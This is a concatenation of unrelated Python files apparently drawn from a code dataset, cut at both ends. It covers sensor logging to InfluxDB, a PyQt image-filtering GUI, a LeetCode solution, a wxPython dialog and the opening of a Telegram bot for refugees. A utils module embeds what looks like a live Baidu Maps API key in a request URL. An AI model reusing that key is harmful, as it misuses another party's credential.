{}'.format(config_backend))\n return backend\n\n\ndef main():\n \"\"\"Main function.\n\n Check config and start pushing data to Influx\n \"\"\"\n global backend\n global json_body\n global clear_hosts\n backend = _get_backend(miflora_backend)\n for hostname in to_scan:\n try:\n mac = valid_miflora_mac(devices[hostname])\n print(\"connecting: %s @ %s\" %(hostname,mac))\n poll(mac, hostname)\n history(mac, hostname)\n except TypeError as type:\n print(\"Mac-Address not correct, please check it!\")\n except base.BluetoothBackendException as blue:\n print(\"We have a Bluetooth issue, please check your device!\")\n except BrokenPipeError as pipe:\n print(\"History Data is corrupted!\")\n except Exception as ex:\n print(str(ex))\n\n try:\n database_error = True\n db_client.write_points(json_body, time_precision='s')\n database_error = False\n\n # Only if transfer of history to DB was successfully transmitted, delete the history of the sensors!\n print(clear_hosts)\n for hostname in clear_hosts:\n mac = valid_miflora_mac(devices[hostname])\n clear_history(mac)\n except requests.exceptions.ConnectionError as connection:\n print(\"Connection to InfluxDB failed!\")\n except Exception as e:\n print(\"Houston, we have a serious problem!\")\n\n # Cache data, if there was a problem with the Database connection\n if database_error:\n try:\n with open(json_filename,'w') as json_file:\n json.dump(json_body,json_file)\n except Exception as e:\n print(\"Sorry, writing to cache file was not possible!\")\n else:\n try: os.remove(json_filename)\n except: pass\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"influx.py","file_name":"influx.py","file_ext":"py","file_size_in_byte":5187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"622202388","text":"#!/usr/bin/python3\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom sys import argv, exit\r\nfrom os import walk\r\n\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtCore import *\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\n\r\nfrom mainWindowLayout import MainLayout\r\n\r\nimport cv2\r\nimport numpy as np\r\nfrom math import sqrt, pow, exp\r\n\r\nclass MainWindow(QMainWindow, MainLayout):\r\n imagePaths = []\r\n originImages = [] \r\n imageList = [] # 二维的图像列表,用于存储原图像以及处理后的图像\r\n hideLayoutTag = -1\r\n\r\n def __init__(self,parent = None):\r\n super(MainWindow, self).__init__(parent)\r\n self.setupUi(self)\r\n self.signalSlots()\r\n setHideButton(self)\r\n\r\n # 绑定按钮与具体方法\r\n def signalSlots(self):\r\n # 文件按钮相关方法\r\n # 打开\r\n self.openAct.triggered.connect(lambda : importImage(self))\r\n # 退出\r\n self.exitAct.triggered.connect(self.close)\r\n\r\n # 灰度变换按钮相关方法\r\n # 指数灰度变换\r\n self.expAct.triggered.connect(lambda : ExpGray(self))\r\n # 负片\r\n self.reverseAct.triggered.connect(lambda : ReverseGray(self))\r\n\r\n # 伽马矫正方法\r\n self.GammaButton.clicked.connect(lambda : GammaChange(self))\r\n\r\n # 滤波按钮相关方法\r\n # 均值滤波\r\n self.avgFilter.triggered.connect(lambda : AvgFilter(self))\r\n # 中值滤波\r\n self.medFilter.triggered.connect(lambda : MedFilter(self))\r\n\r\n # 拉普拉斯锐化方法\r\n self.LaplaceButton.clicked.connect(lambda : Laplacian(self))\r\n\r\n # 傅里叶变换方法\r\n self.FourierButton.clicked.connect(lambda : FourierChange(self))\r\n\r\n # 直方图均衡化方法\r\n self.HistogramButton.clicked.connect(lambda : HistogramEqualization(self))\r\n\r\n # 频率域滤波按钮相关方法\r\n # 布特沃思高通滤波\r\n self.ButterworthHighAct.triggered.connect(lambda : ButterworthHigh(self))\r\n # 布特沃思低通滤波\r\n self.ButterworthLowAct.triggered.connect(lambda : ButterworthLow(self))\r\n\r\n # 图像复原相关方法\r\n # 频率域逆滤波\r\n self.InverseFilteringAct.triggered.connect(lambda : InverseFiltering(self))\r\n # 维纳滤波\r\n self.WienerFilteringAct.triggered.connect(lambda : WienerFiltering(self))\r\n\r\n # 底部按钮\r\n # 上一张\r\n self.preButton.clicked.connect(lambda : preImage(self))\r\n # 下一张\r\n self.nextButton.clicked.connect(lambda : nextImage(self))\r\n # 退出\r\n self.exitButton.clicked.connect(self.close)\r\n\r\n\r\n# 灰度变换按钮相关方法\r\n# 指数灰度变换\r\ndef ExpGray(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n img_info = img[0].shape\r\n img_height = img_info[0]\r\n img_width = img_info[1]\r\n result = []\r\n result = np.arange(img_height*img_width*3, dtype='uint8').reshape(img_height, img_width, 3)\r\n for i in range(img_height):\r\n for j in range(img_width):\r\n for k in range(3):\r\n # 对原图像的像素进行指数处理\r\n result[i][j][k] = 7.0 * pow(img[0][i][j][k], 0.6)\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','指数灰度变换'])\r\n\r\n# 负片\r\ndef ReverseGray(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n # 对原图像进行负片处理\r\n result = 255-img[0]\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','负片'])\r\n\r\n\r\n# 伽马矫正按钮方法\r\ndef GammaChange(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n img_info = img[0].shape\r\n img_height = img_info[0]\r\n img_width = img_info[1]\r\n result = []\r\n result = np.arange(img_height*img_width*3, dtype='uint8').reshape(img_height, img_width, 3)\r\n for i in range(img_height):\r\n for j in range(img_width):\r\n for k in range(3):\r\n # 对原图像的像素进行伽马矫正\r\n result[i][j][k] = 1.0 * np.power(img[0][i][j][k]/255.0, 1/0.6) * 255.0\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','伽马矫正'])\r\n\r\n#滤波按钮相关方法\r\n#均值滤波\r\ndef AvgFilter(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n # 对原图像进行均值滤波\r\n result = cv2.blur(img[0], (5, 5))\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','均值滤波'])\r\n\r\n#中值滤波\r\ndef MedFilter(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n # 对原图像进行中值滤波\r\n result = cv2.medianBlur(img[0],5)\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','中值滤波'])\r\n\r\n\r\n#拉普拉斯锐化按钮方法\r\ndef Laplacian(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n img_height, img_width = img[0].shape[:2]\r\n # 获得原图像的拉普拉斯算子\r\n laplace = cv2.Laplacian(img[0], cv2.CV_64F, ksize=3)\r\n laplace[laplace<0] = 0\r\n laplace[laplace>255] = 255\r\n # 原图像减去拉普拉斯算子,得到锐化后的图像\r\n result = img[0] - laplace\r\n result[result<0] = 0\r\n result[result>255] = 255\r\n result = cv2.resize(src=result, dsize=(img_height, img_width)).astype('uint8')\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','拉普拉斯锐化'])\r\n\r\n\r\n# 傅里叶变换按钮方法\r\ndef FourierChange(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n # 提取图像的三个通道\r\n b,g,r = cv2.split(img[0])\r\n # 对每个通道单独进行傅里叶变换\r\n b_freImg,b_recImg = oneChannelDft(b)\r\n g_freImg, g_recImg = oneChannelDft(g)\r\n r_freImg, r_recImg = oneChannelDft(r)\r\n # 将处理后的通道合并成一个图像\r\n freImg = cv2.merge([b_freImg,g_freImg,r_freImg])\r\n imgs.extend([img[0],freImg])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','傅里叶变换'])\r\ndef oneChannelDft(img):\r\n width, height = img.shape\r\n nwidth = cv2.getOptimalDFTSize(width)\r\n nheigth = cv2.getOptimalDFTSize(height)\r\n nimg = np.zeros((nwidth, nheigth))\r\n nimg[:width, :height] = img\r\n dft = cv2.dft(np.float32(nimg), flags = cv2.DFT_COMPLEX_OUTPUT)\r\n ndft = dft[:width, :height]\r\n ndshift = np.fft.fftshift(ndft)\r\n magnitude = np.log(cv2.magnitude(ndshift[:, :, 0], ndshift[:, :, 1]))\r\n result = (magnitude - magnitude.min()) / (magnitude.max() - magnitude.min()) * 255\r\n frequencyImg = result.astype('uint8')\r\n ilmg = cv2.idft(dft)\r\n ilmg = cv2.magnitude(ilmg[:, :, 0], ilmg[:, :, 1])[:width, :height]\r\n ilmg = np.floor((ilmg - ilmg.min()) / (ilmg.max() - ilmg.min()) * 255)\r\n recoveredImg = ilmg.astype('uint8')\r\n return frequencyImg,recoveredImg\r\n\r\n# 直方图均衡化按钮方法\r\ndef HistogramEqualization(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n b, g, r = cv2.split(img[0])\r\n b_equal = cv2.equalizeHist(b)\r\n g_equal = cv2.equalizeHist(g)\r\n r_equal = cv2.equalizeHist(r)\r\n result = cv2.merge([b_equal, g_equal, r_equal])\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','直方图均衡化'])\r\n\r\n# 频率域滤波按钮相关方法\r\n# 布特沃斯高通滤波\r\ndef ButterworthHigh(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n # 提取图像的三个通道\r\n B, G, R = cv2.split(img[0])\r\n # 对每个通道单独进行布特沃斯高通滤波,D0取20\r\n B = OneChannelButterworth(B, 1, 20)\r\n G = OneChannelButterworth(G, 1, 20)\r\n R = OneChannelButterworth(R, 1, 20)\r\n # 将处理后的通道合并成一个图像\r\n result = cv2.merge([B, G, R])\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','布特沃斯高通滤波'])\r\n\r\n# 布特沃斯低通滤波\r\ndef ButterworthLow(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n # 提取图像的三个通道\r\n B, G, R = cv2.split(img[0])\r\n # 对每个通道单独进行布特沃斯低通滤波,D0取80\r\n B = OneChannelButterworth(B, 0, 80)\r\n G = OneChannelButterworth(G, 0, 80)\r\n R = OneChannelButterworth(R, 0, 80)\r\n # 将处理后的通道合并成一个图像\r\n result = cv2.merge([B, G, R])\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','布特沃斯低通滤波'])\r\n\r\ndef OneChannelButterworth(image, method, D0):\r\n n = 2\r\n img_height, img_width = image.shape[:2]\r\n dft_img = np.fft.fft2(image)\r\n dft_img = np.fft.fftshift(dft_img)\r\n H = np.zeros_like(dft_img)\r\n for i in range(img_height):\r\n for j in range(img_width):\r\n D = sqrt((pow(i-img_height/2, 2)+pow(j-img_width/2, 2)))\r\n H[i][j] = 1./(1+pow(D/D0, 2*n))\r\n if method:\r\n result = dft_img*(1-H)\r\n else:\r\n result = dft_img*H\r\n idft_img = np.fft.ifftshift(result)\r\n idft_img = np.fft.ifft2(idft_img)\r\n result = np.abs(np.real(idft_img))\r\n result = np.clip(result,0,255)\r\n return result.astype('uint8')\r\n\r\n\r\n# 图像复原按钮相关方法\r\n# 频率逆滤波\r\ndef InverseFiltering(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n # 提取图像的三个通道\r\n B, G, R = cv2.split(img[0])\r\n # 对每个通道单独进行频率逆滤波\r\n B = OneChannelIF(B)\r\n G = OneChannelIF(G)\r\n R = OneChannelIF(R)\r\n # 将处理后的通道合并成一个图像\r\n result = cv2.merge([B, G, R])\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','频率域逆滤波图像复原'])\r\ndef OneChannelIF(image):\r\n img_height, img_width = image.shape[:2]\r\n result = np.zeros_like(image, dtype=complex)\r\n # 先对原图像进行傅里叶变换并移至中心\r\n dft_img = np.fft.fft2(image)\r\n dft_img = np.fft.fftshift(dft_img)\r\n for i in range(img_height):\r\n for j in range(img_width):\r\n result[i][j] = dft_img[i][j] / H(i,j)\r\n # 对图像进行逆傅里叶变换\r\n idft_img = np.fft.ifftshift(result)\r\n idft_img = np.fft.ifft2(idft_img)\r\n result = np.abs(np.real(idft_img))\r\n result = np.clip(result,0,255)\r\n return result.astype('uint8')\r\n\r\n#维纳滤波\r\ndef WienerFiltering(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n # 提取图像的三个通道\r\n B, G, R = cv2.split(img[0])\r\n # 对每个通道单独进行维纳滤波\r\n B = OneChannelWF(B)\r\n G = OneChannelWF(G)\r\n R = OneChannelWF(R)\r\n # 将处理后的通道合并成一个图像\r\n result = cv2.merge([B, G, R])\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','维纳滤波图像复原'])\r\ndef OneChannelWF(image):\r\n K = 0.0001\r\n img_height, img_width = image.shape[:2]\r\n result = np.zeros_like(image, dtype=complex)\r\n # 先对原图像进行傅里叶变换并移至中心\r\n dft_img = np.fft.fft2(image)\r\n dft_img = np.fft.fftshift(dft_img)\r\n for i in range(img_height):\r\n for j in range(img_width):\r\n result[i][j] = (H(i,j)/(pow(H(i,j),2)+K))*dft_img[i][j]\r\n # 对图像进行逆傅里叶变换\r\n idft_img = np.fft.ifftshift(result)\r\n idft_img = np.fft.ifft2(idft_img)\r\n result = np.abs(np.real(idft_img))\r\n result = np.clip(result,0,255)\r\n return result.astype('uint8')\r\n\r\ndef H(u, v):\r\n k = 0.00001\r\n return exp(-1*k*pow(pow(u,2)+pow(v,2), 5/6))\r\n\r\n#打开图像\r\ndef importImage(window):\r\n fname, _ = QFileDialog.getOpenFileName(window, 'Open file', '.', 'Image Files(*.jpg *.bmp *.png *.jpeg *.rgb *.tif)')\r\n if fname != '':\r\n window.importImageEdit.setText(fname)\r\n window.imagePaths = []\r\n window.originImages = []\r\n window.imageList = []\r\n window.imagePaths.append(fname)\r\n if window.imagePaths != []:\r\n readIamge(window)\r\n resizeFromList(window, window.originImages)\r\n showImage(window)\r\n showButton(window)\r\n\r\ndef readIamge(window):\r\n window.originImages = []\r\n for path in window.imagePaths:\r\n imgs = []\r\n img = cv2.imdecode(np.fromfile(path, dtype = np.uint8), 1)\r\n imgs.append(img)\r\n window.originImages.append(imgs)\r\n\r\n#显示图像\r\ndef showImage(window,headers = []):\r\n window.showImageView.clear()\r\n window.showImageView.setColumnCount(len(window.imageList[0]))\r\n window.showImageView.setRowCount(len(window.imageList))\r\n\r\n window.showImageView.setShowGrid(False)\r\n window.showImageView.setEditTriggers(QAbstractItemView.NoEditTriggers)\r\n window.showImageView.setHorizontalHeaderLabels(headers)\r\n for x in range(len(window.imageList[0])):\r\n for y in range(len(window.imageList)):\r\n imageView = QGraphicsView()\r\n imageView.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\r\n imageView.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\r\n\r\n img = window.imageList[y][x]\r\n width = img.shape[1]\r\n height = img.shape[0]\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n\r\n window.showImageView.setColumnWidth(x, width)\r\n window.showImageView.setRowHeight(y, height)\r\n\r\n frame = QImage(img, width, height, QImage.Format_RGB888)\r\n # 调用QPixmap命令,建立一个图像存放框\r\n pix = QPixmap.fromImage(frame)\r\n item = QGraphicsPixmapItem(pix) \r\n scene = QGraphicsScene() # 创建场景\r\n scene.addItem(item)\r\n imageView.setScene(scene)\r\n window.showImageView.setCellWidget(y, x, imageView)\r\n\r\ndef resizeFromList(window,imageList):\r\n width = 600\r\n height = 600\r\n window.imageList = []\r\n for x_pos in range(len(imageList)):\r\n imgs = []\r\n for img in imageList[x_pos]:\r\n image = cv2.resize(img, (width, height), interpolation = cv2.INTER_CUBIC)\r\n imgs.append(image)\r\n window.imageList.append(imgs)\r\n\r\n# 设置按钮不可见\r\ndef setHideButton(window):\r\n window.GrayButton.hide()\r\n window.GammaButton.hide()\r\n window.FilterButton.hide()\r\n window.LaplaceButton.hide()\r\n window.FourierButton.hide()\r\n window.HistogramButton.hide()\r\n window.FrequencyButton.hide()\r\n window.RestoreButton.hide()\r\n window.preButton.setEnabled(False)\r\n window.nextButton.setEnabled(False)\r\n\r\n# 设置按钮可见\r\ndef showButton(window):\r\n window.GrayButton.setVisible(True)\r\n window.GammaButton.setVisible(True)\r\n window.FilterButton.setVisible(True)\r\n window.LaplaceButton.setVisible(True)\r\n window.FourierButton.setVisible(True)\r\n window.HistogramButton.setVisible(True)\r\n window.FrequencyButton.setVisible(True)\r\n window.RestoreButton.setVisible(True)\r\n window.preButton.setEnabled(True)\r\n window.nextButton.setEnabled(True)\r\n\r\n# 获取所得文件的目录\r\ndef getDirFromFname(fname):\r\n pathList=fname.split('/')\r\n filename=pathList.pop()\r\n dirname='/'.join(pathList)\r\n return dirname,filename\r\n\r\n# 上一页按钮事件\r\ndef preImage(window):\r\n fname=window.imagePaths[0]\r\n dirname,filename=getDirFromFname(fname)\r\n imageList=[]\r\n picTypes=['.jpg','.bmp','.png','.jpeg','.rgb','.tif']\r\n root, dirs, files = walk(dirname).__next__()\r\n for file in files:\r\n if(file[-4:] in picTypes or file[-5:] in picTypes):\r\n imageList.append(file)\r\n index=imageList.index(filename)\r\n if index==0:\r\n window.preButton.setEnabled(False)\r\n QMessageBox.information(window, \"错误提示\", \"这已经是第一张图片\", QMessageBox.Ok)\r\n else: \r\n window.nextButton.setEnabled(True)\r\n index=index-1\r\n fname=root+'/'+imageList[index]\r\n window.importImageEdit.setText(fname)\r\n window.imagePaths = []\r\n window.originImages = []\r\n window.imageList = []\r\n window.imagePaths.append(fname)\r\n if window.imagePaths != []:\r\n readIamge(window)\r\n resizeFromList(window, window.originImages)\r\n showImage(window)\r\n\r\n# 下一页按钮事件\r\ndef nextImage(window):\r\n fname=window.imagePaths[0]\r\n dirname,filename=getDirFromFname(fname)\r\n imageList=[]\r\n picTypes=['.jpg','.bmp','.png','.jpeg','.rgb','.tif']\r\n root, dirs, files = walk(dirname).__next__()\r\n for file in files:\r\n if(file[-4:] in picTypes or file[-5:] in picTypes):\r\n imageList.append(file)\r\n index=imageList.index(filename)\r\n if index==len(imageList)-1:\r\n window.nextButton.setEnabled(False)\r\n QMessageBox.information(window, \"错误提示\", \"这已经是最后一张图片\", QMessageBox.Ok)\r\n else: \r\n window.preButton.setEnabled(True)\r\n index=index+1\r\n fname=root+'/'+imageList[index]\r\n window.importImageEdit.setText(fname)\r\n window.imagePaths = []\r\n window.originImages = []\r\n window.imageList = []\r\n window.imagePaths.append(fname)\r\n if window.imagePaths != []:\r\n readIamge(window)\r\n resizeFromList(window, window.originImages)\r\n showImage(window)\r\n\r\nif __name__ == '__main__':\r\n\r\n app = QApplication(argv)\r\n mw = MainWindow()\r\n mw.show()\r\n exit(app.exec_())\r\n","sub_path":"mainWindow.py","file_name":"mainWindow.py","file_ext":"py","file_size_in_byte":18531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"595480062","text":"class Solution:\n def search(self, nums: List[int], target: int, l = None, r = None) -> int:\n l = l if l is not None else 0\n r = r if r is not None else len(nums) - 1\n \n while r >= l:\n mid = (r + l) // 2\n \n if nums[mid] == target:\n return mid\n elif (nums[r] >= nums[mid] and nums[l] >= nums[mid]) or (nums[r] <= nums[mid] and nums[l] <= nums[mid]):\n # It can be on either side:\n ls = self.search(nums, target, l, mid - 1) \n rs = self.search(nums, target, mid+1, r)\n if max(ls, rs) >=0:\n return max(ls, rs)\n else:\n break\n elif nums[mid] > target:\n r = mid - 1\n else:\n l = mid + 1\n \n return -1\n","sub_path":"problems/Search in Rotated Sorted Array/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"478192244","text":"# _*_ coding: UTF-8 _*_\n'''\nCreated on 2015年2月28日\n\n@author: dev\n'''\nimport datetime\nimport json\nimport logging\n\nimport httplib2\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef getDay(_days):\n return datetime.date.today() + datetime.timedelta(days=_days)\n\n\ndef getWeek(_day):\n week = {0:'周一', 1:'周二', 2:'周三', 3:'周四', 4:'周五', 5:'周六', 6:'周日'}\n return week.get(_day.weekday()) \n\n\ndef getLbsData(longitude, latitude, ltype, shopid):\n url = 'http://api.map.baidu.com/geosearch/v3/nearby?ak=WqtBXK9Vm1p0sGvr48h8rpO0&geotable_id=85323&page_size=50&location=%s,%s&radius=15000&sortby=distance:1&filter=%s'\n h = httplib2.Http()\n if shopid :\n myfilter = 'ltype:[' + ltype + ']|shopid:[' + shopid + ']'\n else :\n myfilter = 'ltype:[' + ltype + ']'\n logger.debug('lbs-url:[%s]' %(url % (longitude,latitude, myfilter)))\n resp, content = h.request(url % (longitude,latitude, myfilter))\n if resp.status == 200 :\n decoded = json.loads(content)\n lbsIds = []\n returnDict = {}\n for local in decoded['contents'] :\n lbsIds.append(local['uid'])\n returnDict[local['uid']]= {'distance':local['distance'],}\n return lbsIds, returnDict\n\n\ndef getUrlData(url):\n h = httplib2.Http()\n resp, content =h.request(url)\n if resp.status == 200 :\n return content\n\ndef sendMessage(phone, code):\n pass\n","sub_path":"mj_py/mj/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"92532482","text":"\n\n#calss header\nclass _COMPENSATION():\n\tdef __init__(self,): \n\t\tself.name = \"COMPENSATION\"\n\t\tself.definitions = [u'money that is paid to someone in exchange for something that has been lost or damaged or for some problem: ', u'something that makes you feel better when you have suffered something bad: ', u'the combination of money and other benefits (= rewards) that an employee receives for doing their job: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_compensation.py","file_name":"_compensation.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"415048322","text":"'''\nImplement the function isWordGuessed that takes in two parameters - a string, secretWord, and a list of letters, lettersGuessed. This function returns a boolean - True if secretWord has been guessed (ie, all the letters of secretWord are in lettersGuessed) and False otherwise.\n\nExample Usage:\n\n>>> secretWord = 'apple' \n>>> lettersGuessed = ['e', 'i', 'k', 'p', 'r', 's']\n>>> print(isWordGuessed(secretWord, lettersGuessed))\nFalse\nFor this function, you may assume that all the letters in secretWord and lettersGuessed are lowercase.\n'''\n\ndef isWordGuessed(secretWord, lettersGuessed):\n '''\n secretWord: string, the word the user is guessing\n lettersGuessed: list, what letters have been guessed so far\n returns: boolean, True if all the letters of secretWord are in lettersGuessed;\n False otherwise\n '''\n guess = False\n for c in secretWord:\n if c in lettersGuessed:\n guess = True\n continue\n elif c not in lettersGuessed:\n guess = False \n break \n return guess\n","sub_path":"Problem Sets/Week3/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"194611961","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\nimport wx\nimport armid\nimport WidgetFactory\n\nclass ContributorEntryDialog(wx.Dialog):\n def __init__(self,parent,firstName = '',surname='',affiliation='',role=''):\n wx.Dialog.__init__(self,parent,armid.CONTRIBUTORENTRY_ID,'Add Contributor',style=wx.DEFAULT_DIALOG_STYLE|wx.MAXIMIZE_BOX|wx.THICK_FRAME|wx.RESIZE_BORDER,size=(500,300))\n self.theFirstName = firstName\n self.theSurname = surname\n self.theAffiliation = affiliation\n self.theRole = role\n mainSizer = wx.BoxSizer(wx.VERTICAL)\n\n mainSizer.Add(WidgetFactory.buildTextSizer(self,'Firstname',(87,30),armid.CONTRIBUTORENTRY_TEXTFIRSTNAME_ID),0,wx.EXPAND)\n mainSizer.Add(WidgetFactory.buildTextSizer(self,'Surname',(87,30),armid.CONTRIBUTORENTRY_TEXTSURNAME_ID),0,wx.EXPAND)\n mainSizer.Add(WidgetFactory.buildTextSizer(self,'Affiliation',(87,30),armid.CONTRIBUTORENTRY_TEXTAFFILIATION_ID),0,wx.EXPAND)\n participantRoles = ['Participant','Facilitator','Scribe']\n mainSizer.Add(WidgetFactory.buildComboSizerList(self,'Role',(87,30),armid.CONTRIBUTORENTRY_COMBOROLE_ID,participantRoles),0,wx.EXPAND)\n mainSizer.Add(wx.StaticText(self,-1),1,wx.EXPAND)\n\n mainSizer.Add(WidgetFactory.buildAddCancelButtonSizer(self,armid.CONTRIBUTORENTRY_BUTTONCOMMIT_ID),0,wx.ALIGN_CENTER)\n self.SetSizer(mainSizer)\n\n wx.EVT_BUTTON(self,armid.CONTRIBUTORENTRY_BUTTONCOMMIT_ID,self.onCommit)\n self.commitLabel = 'Add'\n if (len(self.theFirstName) > 0):\n self.commitLabel = 'Edit'\n self.SetLabel('Edit Contributor')\n firstNameCtrl = self.FindWindowById(armid.CONTRIBUTORENTRY_TEXTFIRSTNAME_ID)\n firstNameCtrl.SetValue(self.theFirstName)\n surnameCtrl = self.FindWindowById(armid.CONTRIBUTORENTRY_TEXTSURNAME_ID)\n surnameCtrl.SetValue(self.theSurname)\n affiliationCtrl = self.FindWindowById(armid.CONTRIBUTORENTRY_TEXTAFFILIATION_ID)\n affiliationCtrl.SetValue(self.theAffiliation)\n roleCtrl = self.FindWindowById(armid.CONTRIBUTORENTRY_COMBOROLE_ID)\n roleCtrl.SetStringSelection(self.theRole)\n buttonCtrl = self.FindWindowById(armid.CONTRIBUTORENTRY_BUTTONCOMMIT_ID)\n buttonCtrl.SetLabel('Edit')\n \n\n def onCommit(self,evt):\n firstNameCtrl = self.FindWindowById(armid.CONTRIBUTORENTRY_TEXTFIRSTNAME_ID)\n surnameCtrl = self.FindWindowById(armid.CONTRIBUTORENTRY_TEXTSURNAME_ID)\n affiliationCtrl = self.FindWindowById(armid.CONTRIBUTORENTRY_TEXTAFFILIATION_ID)\n roleCtrl = self.FindWindowById(armid.CONTRIBUTORENTRY_COMBOROLE_ID)\n\n self.theFirstName = firstNameCtrl.GetValue()\n self.theSurname = surnameCtrl.GetValue()\n self.theAffiliation = affiliationCtrl.GetValue()\n self.theRole = roleCtrl.GetStringSelection()\n\n if (len(self.theFirstName) == 0):\n dlg = wx.MessageDialog(self,'No firstname',self.commitLabel + ' Contributor',wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n return\n elif (len(self.theSurname) == 0):\n dlg = wx.MessageDialog(self,'No surname',self.commitLabel + ' Contributor',wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n return\n elif (len(self.theAffiliation) == 0):\n dlg = wx.MessageDialog(self,'No affiliation',self.commitLabel + ' Contributor',wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n return\n elif (len(self.theRole) == 0):\n dlg = wx.MessageDialog(self,'No role',self.commitLabel + ' Contributor',wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n return\n else:\n self.EndModal(armid.CONTRIBUTORENTRY_BUTTONCOMMIT_ID)\n\n def firstName(self): return self.theFirstName\n def surname(self): return self.theSurname\n def affiliation(self): return self.theAffiliation\n def role(self): return self.theRole\n","sub_path":"cairis/cairis/ContributorEntryDialog.py","file_name":"ContributorEntryDialog.py","file_ext":"py","file_size_in_byte":4461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"346057023","text":"# Bot helper fragment for refugee women from Ukraine\n\n# pip install aiogram\nimport sys\nimport logging\n\nfrom aiogram import Bot, Dispatcher, executor\nfrom aiogram.types import Message, \\\n InlineKeyboardButton, InlineKeyboardMarkup\n# CallbackQuery, KeyboardButton\n\nfrom config import TOKEN_KEY\n\n#photo = open('logo.png', 'rb')\n\n#sys.path.append('../../')\n\n#logging.basicConfig(level=logging.INFO)\n\nTOKEN = TOKEN_KEY\nprint(TOKEN)\nbot = Bot(TOKEN)\ndp = Dispatcher(bot)\n\n\n\nfrom aiohttp import ClientSession\n\nfrom config import MEASUREMENT_ID, API_SECRET\n\n\nasync def send_analytics(user_id, user_lang_code, action_name):\n \"\"\"\n Send record to Google Analytics\n \"\"\"\n params = {\n 'client_id': str(user_id),\n 'user_id': str(user_id),\n 'events': [{\n 'name': action_name,\n 'params': {\n 'language': user_lang_code,\n 'engagement_time_msec': '1',\n }\n }],\n }\n async with ClientSession() as session:\n await session.post(\n f'https://www.google-analytics.com/'\n f'mp/collect?measurement_id={MEASUREMENT_ID}&api_secret={API_SECRET}',\n json=params)\n\n\n\n# Пишем команду с приветствием и заставкой\n@dp.message_handler(commands=['start'])\nasync def callback_start(message: Message):\n #await bot.send_photo(chat_id=message.chat.id, photo=open('logo.png', 